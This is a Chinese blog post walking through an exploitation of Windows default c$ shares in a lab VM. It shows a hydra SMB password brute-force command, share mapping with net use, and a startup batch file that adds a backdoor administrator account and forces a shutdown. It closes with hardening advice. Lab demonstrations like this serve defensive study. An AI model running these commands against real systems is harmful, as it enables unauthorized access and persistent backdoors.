可能是最全的windows默认共享风险利用

        我是安全界的小学生,之前写了一篇“windows彻底关闭默认共享”,但是一直未研究“为什么要关闭?不关闭能咋地?”,最近进行了一次验证实验,探索了默认共享会带来的危害,加深了对默认共享的理解,闲言少叙,主戳主题:

一、所需条件:

1、个人PC(后面都称作本机)

2、虚拟机上windows服务器 192.168.67.128

3、hydra工具:进行暴力破解

二、开始实验:

1、本机状态


本机初始状态


2、windows服务器状态


windows服务器状态


3、在本机输入命令:net use k: \\192.168.67.128\c$


在本机进行操作1

结果:


在本机进行操作2

输入已破解用户的用户名和密码,比如:Administrator  password

如果密码错误,使用hydra进行破解:(附上hydra使用方法

命令为:hydra -l administrator -P pass.txt 192.168.67.128 smb


破解命令

破解结果:发现密码是123456


使用hydra破解结果

然后再进行登录:登录成功


破解密码后再进行登录

4、在查看本机,会发现多了一个k盘(为windows服务器c盘的映射)


成功映射到本地

5、在开机启动项里添加批处理文件

先写一个批处理文件:

copy con  111.bat

net user Ethan 123456 /add

net localgroup Administrators Ethan /add

shutdown -s -t 180 -c "hello man,your PC has been hacked by Ethan!!!"


写一个简单批处理

复制到桌面和启动下面:


复制到桌面


复制到开启启动项

6、当对方重启服务器、或者出于好奇,打开桌面的.bat文件时:弹出关机提示,同时新建Ethan用户。


重启弹出开机提示

查看,已经创建新的Ethan超级管理员账户

已创建Ethan用户

此时,如果对方未发现Ethan用户,就算修改administrator用户,仍然有Ethan用户作为后门。


使用Ethan用户进行登录

7、如果服务器开启了远程桌面,也可以使用Ethan账户进行远程桌面登录。


输入Ethan用户名和密码

成功:


成功拿下服务器

三、总结:

关于windows默认共享问题,要想利用,首先需要服务器开了共享,其次是知道对方的用户名和口令,所以还是要注意修改默认用户名,并加强口令复杂度。

如果不需要,彻底关闭默认共享

我是安全界的小学生,欢迎大家批评指导。

©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

  • 本文是Medusa和Hydra快速入门手册的第二部分,第一部分的传送门这两篇也是后续爆破篇的一部分,至于字典,放在...
    LinuxSelf阅读 8,044评论 0 4
  • 命令简介 cmd是command的缩写.即命令行 。 虽然随着计算机产业的发展,Windows 操作系统的应用越来...
    Littleston阅读 8,605评论 0 12
  • 运行操作 CMD命令:开始->运行->键入cmd或command(在命令行里可以看到系统版本、文件系统版本) CM...
    小沐子_IT阅读 8,134评论 0 4
  • 运行操作 CMD命令:开始->运行->键入cmd或command(在命令行里可以看到系统版本、文件系统版本) CM...
    小明yz阅读 7,943评论 0 8
  • win7 cmd管理员权限设置 net localgroup administrators 用户名 /add 把“...
    f675b1a02698阅读 10,761评论 0 11

友情链接更多精彩内容